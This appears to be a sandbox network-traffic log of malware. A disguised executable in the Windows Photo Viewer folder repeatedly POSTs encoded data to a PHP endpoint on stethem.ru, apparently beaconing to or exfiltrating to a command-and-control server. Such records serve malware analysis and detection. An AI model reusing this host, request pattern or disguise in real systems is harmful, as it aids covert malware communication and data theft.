Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
44	192.168.2.4	49827	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:28.650840998 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:29.000668049 CET	1072	OUT	Data Raw: 5a 5b 58 5c 5b 43 51 56 5c 57 57 56 5a 5a 54 56 55 5b 59 5a 55 5d 57 5c 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z[X\[CQV\WWVZZTVU[YZU]W\ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9\*#<-"%0$+]"94/)'-5.]&&:'(:;![",\-
Dec 28, 2024 22:19:29.781492949 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:30.029474974 CET	794	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2B13ULVuODq0Tsb93aym9bTZyt%2FdwKy578U6YiMqpqBHC2eAc52GcAvLwcmPRZcpBYOkiqyHQQyTRkvC1DVT4fESwFC%2BfdGEmsNfjiNC1URZB2X%2B0dmQzGFLfOPQi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496c21ee642cb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3664&min_rtt=1885&rtt_var=4266&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=90553&cwnd=162&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49833	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:30.272202015 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:30.625746012 CET	1788	OUT	Data Raw: 5a 5b 5d 56 5b 44 54 5c 5c 57 57 56 5a 54 54 51 55 5b 59 50 55 55 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z[]V[DT\\WWVZTTQU[YPUUWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:*3$_+>=]1Z(X$/^ )?\,''.$V5"Y%&)3;>8<![",\-
Dec 28, 2024 22:19:31.450403929 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:31.697041988 CET	946	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b53UzGiSz1xdsBeipFJ0v89cpLPW0DVZEEzqj9lL3ogz3qa8mnM%2BOBR%2BDtGnJsti8eIwRCE0MjwaPnDkRbvJC4PwblCi%2FlOibcDu%2BPqRHwOGt6Uj%2FB4XMXAWliWz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496cc5f2ec32f-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8375&min_rtt=1653&rtt_var=14064&sent=5&recv=8&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=26338&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 1f 23 35 36 1c 21 1d 31 52 30 07 31 08 3f 19 2f 58 3f 09 35 12 30 17 06 57 3d 33 30 52 30 3a 2e 12 26 2e 2e 50 27 02 31 01 25 39 28 51 06 12 22 1b 21 3f 01 1f 2e 39 20 05 30 0e 0c 40 22 13 1c 04 33 39 22 09 27 38 2d 11 22 29 27 52 2f 03 36 0e 28 3a 2b 1e 2b 22 35 00 23 2b 2e 57 02 13 27 53 28 3e 3c 0d 35 32 3f 5c 27 28 02 06 21 2f 03 18 24 17 0c 52 20 2e 24 05 29 5a 30 16 23 51 3f 54 2a 00 3f 5a 23 38 30 51 3f 13 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"#56!1R01?/X?50W=30R0:.&..P'1%9(Q"!?.9 0@"39"'8-")'R/6(:++"5#+.W'S(><52?\'(!/$R .$)Z0#Q?T*?Z#80Q?"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49834	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:30.419658899 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:30.766366959 CET	1072	OUT	Data Raw: 5a 5b 58 5d 5e 45 54 56 5c 57 57 56 5a 59 54 53 55 52 59 5c 55 57 57 5c 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z[X]^ETV\WWVZYTSURY\UWW\ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:)<]?>%,$'7079]/_?'0Q# 5%"A0;%-<![",\-2
Dec 28, 2024 22:19:31.505253077 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:31.746707916 CET	787	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=03LHgnoT6NggMTVv4l4%2BDlMgTjjaaPniWApmT%2FlG5FcDK4d9GvOp8TVKrKrTRABQwjycy4EK8EtIlkEX3ZHiPMMhTyhTR1lDznnDtGuZmtGcdyAFNzpyZ1w8wQw%2B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496ccfbab42f2-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3991&min_rtt=2015&rtt_var=4707&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=81916&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a Data Ascii: 4>[[X
Dec 28, 2024 22:19:31.938555956 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49839	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:32.180707932 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:32.547220945 CET	1072	OUT	Data Raw: 5a 53 58 5c 5e 40 51 51 5c 57 57 56 5a 5c 54 55 55 5b 59 5c 55 52 57 58 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZSX\^@QQ\WWVZ\TUU[Y\URWXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9+3<9%4X$'+^#']/)$&=P# .^%&"E$;6/![",\-&
Dec 28, 2024 22:19:33.357230902 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:33.610124111 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=O3EfO08IZjYP81YZi1GoQK9K4ugeqzVUTciYDnijVYAxx0pgHyj6Cq3n%2FVtQ1YRrZ5Ga3UZCNk1NWLbv1GeQqTnVVneKYIoTmyCxnpM4tLyjT1FOenP0x3mR%2FRVK"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496d87a6e189d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=5501&min_rtt=1448&rtt_var=8649&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=43102&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49845	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:33.851469040 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:34.203855038 CET	1072	OUT	Data Raw: 5f 5b 58 54 5e 45 54 5d 5c 57 57 56 5a 5a 54 56 55 52 59 59 55 56 57 58 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _[XT^ET]\WWVZZTVURYYUVWXZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:> ,_<% ^0?Z#)(,)#$=5*_1%0%8,![",\-
Dec 28, 2024 22:19:34.981944084 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:35.232598066 CET	797	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HudvbEOJfEKIBzjzCgaq7QT6j3%2BjjUFniB2Gm22lEhUT97AnHDkFz6WY1ShJYp4RlQjyKKVv1pAvt%2BscU1UVaKAucQF%2Fh5VRs3oylHDFSJ6vA1%2FoldLznbJ4%2FuiR"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496e29b1943fb-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=7634&min_rtt=1586&rtt_var=12691&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1395&delivery_rate=29216&cwnd=179&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49848	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:35.881010056 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1064 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:36.235052109 CET	1064	OUT	Data Raw: 5a 5c 58 50 5b 45 51 50 5c 57 57 56 5a 5d 54 57 55 51 59 5f 55 52 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: Z\XP[EQP\WWVZ]TWUQY_URWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:=$\<=%]1Z+0 ;,:;3.3562>'>,,![",\-2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49852	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:36.824906111 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1788 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:37.172544956 CET	1788	OUT	Data Raw: 5a 52 5d 51 5e 41 51 57 5c 57 57 56 5a 5a 54 53 55 5a 59 5c 55 56 57 5e 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZR]Q^AQW\WWVZZTSUZY\UVW^ZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X:='=.\%+',#(,8$,R!12%'-<![",\-
Dec 28, 2024 22:19:38.001116037 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:38.254249096 CET	939	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PpVMx%2BLnWdjiYJqv8i0raOOXHLXLeC5rTS036ZVjTyQ54JhVMY8RMnfm9ZMvZ%2FjlwQefgx0sNpCrQdA6yVSHQQ9MKDg53AB6uvO3SlbBso2kRCJ5xSnEL8PQ4M1x"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496f57a7bde9b-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3148&min_rtt=1460&rtt_var=3924&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2111&delivery_rate=97547&cwnd=191&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0c 13 22 55 34 0b 35 09 35 33 00 0d 24 29 0b 08 3f 0e 23 13 3c 23 2d 5f 30 17 09 0e 29 23 24 18 30 07 2a 5e 27 07 32 55 30 3c 00 13 31 29 28 51 06 12 22 1d 20 3f 24 0c 2e 2a 27 58 25 20 00 42 22 3e 29 1e 25 3a 3e 09 26 06 25 10 21 39 06 0e 2f 39 22 0a 29 5f 30 40 28 21 32 12 37 01 2e 57 02 13 27 14 3c 00 2f 55 36 31 2b 5b 24 28 23 14 20 2f 2e 09 30 5f 3d 0b 37 3e 20 04 29 3c 24 16 37 09 3f 54 3d 00 20 07 23 38 38 54 28 29 22 55 2d 0e 2e 56 0f 35 56 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98"U4553$)?#<#-_0)#$0^'2U0<1)(Q" ?$.'X% B">)%:>&%!9/9")_0@(!27.W'</U61+[$(# /.0_=7> )<$7?T= #88T()"U-.V5VT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49853	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:36.944205999 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1064 Expect: 100-continue Connection: Keep-Alive
Dec 28, 2024 22:19:37.297627926 CET	1064	OUT	Data Raw: 5f 5e 5d 56 5b 43 51 52 5c 57 57 56 5a 5d 54 56 55 50 59 5a 55 54 57 53 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: _^]V[CQR\WWVZ]TVUPYZUTWSZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9><X<>.2<?$4/_ 3Y.)Z$S##1"06,![",\-6
Dec 28, 2024 22:19:38.121157885 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:38.378367901 CET	790	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xq7Hn6DkmetnIM9OYPZa%2BQnAk1cEWqPoRYcOqfPTK%2FCeTGsoZzSr87js0j0uDQ2iyyYPtxFuLgALIjWX2b6TRgmnZCECR43cSnkf9zexqiokBLUuV6JhSLvyBUiZ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f9496f63da7c481-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=3822&min_rtt=1469&rtt_var=5257&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1387&delivery_rate=71945&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49859	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:38.990891933 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:39.344674110 CET	1072	OUT	Data Raw: 5a 59 58 55 5e 45 54 50 5c 57 57 56 5a 54 54 56 55 54 59 5a 55 53 57 52 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZYXU^ETP\WWVZTTVUTYZUSWRZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9X<<18Y$$0##];:#';!#52&"0%/<![",\-
Dec 28, 2024 22:19:40.121346951 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:40.366265059 CET	793	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=toBwufFc9U8ZVeViCPEGehrJaw7p5giWCu9Z4COsz9xN08N56K6JwYalH%2BE2vO4kJIzv%2FtLoqvoOjjkgQdv6ynBen3Zj7KRhL%2BIqcN0jtjAe3OevVg5JUgvQHFbT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f949702bf0c8c81-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=8231&min_rtt=2053&rtt_var=13126&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=28361&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49864	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:40.619636059 CET	299	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue
Dec 28, 2024 22:19:40.969598055 CET	1072	OUT	Data Raw: 5a 59 58 51 5e 41 54 53 5c 57 57 56 5a 5a 54 5a 55 53 59 5b 55 53 57 59 5a 58 5e 50 54 52 56 54 5a 58 50 5e 5a 5f 54 5d 5a 5d 50 5f 58 5e 52 55 50 5e 5b 46 59 5a 59 53 50 5b 50 59 59 51 51 42 5a 58 43 5d 59 58 52 53 5b 59 5f 5a 5f 58 59 54 54 5f Data Ascii: ZYXQ^ATS\WWVZZTZUSY[USWYZX^PTRVTZXP^Z_T]Z]P_X^RUP^[FYZYSP[PYYQQBZXC]YXRS[Y_Z_XYTT__VTXVBVUP^]YTXTYXVUZ]RYPD[\_\Y\][YZ[TT[XX[R^__[R\QQ\X[]]_QP\XQWQWWZ_U[XYX_[QZ_\P]\XSVPZVV]^]UVB]\R]]^X9^*U,==!2,734")7X,9]0"#.Y%5'8;<![",\-
Dec 28, 2024 22:19:41.750865936 CET	25	IN	HTTP/1.1 100 Continue
Dec 28, 2024 22:19:41.993144989 CET	796	IN	HTTP/1.1 200 OK Date: Sat, 28 Dec 2024 21:19:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HU4Poq2KAO3GztOefsuTZr1mOEwXF6UIWQy0nfPWOOwU9Pvn%2Fj4hkAs%2FM5n9CTxnHR1ydfNtRMpcYPXOObObPy%2BAuQJHf%2BC699KoUju87kVE%2BUpaeOObMQodnoNc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f94970cfddd0f93-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=4312&min_rtt=1673&rtt_var=5906&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1371&delivery_rate=64071&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3e 5b 5b 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4>[[X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49868	172.67.132.55	80	3696	C:\Program Files (x86)\Windows Photo Viewer\wDyQbcxdSUUjszASb.exe

Timestamp	Bytes transferred	Direction	Data
Dec 28, 2024 22:19:42.225987911 CET	323	OUT	POST /ImageprocessLinuxgeneratorTestdleLocal.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: stethem.ru Content-Length: 1072 Expect: 100-continue Connection: Keep-Alive
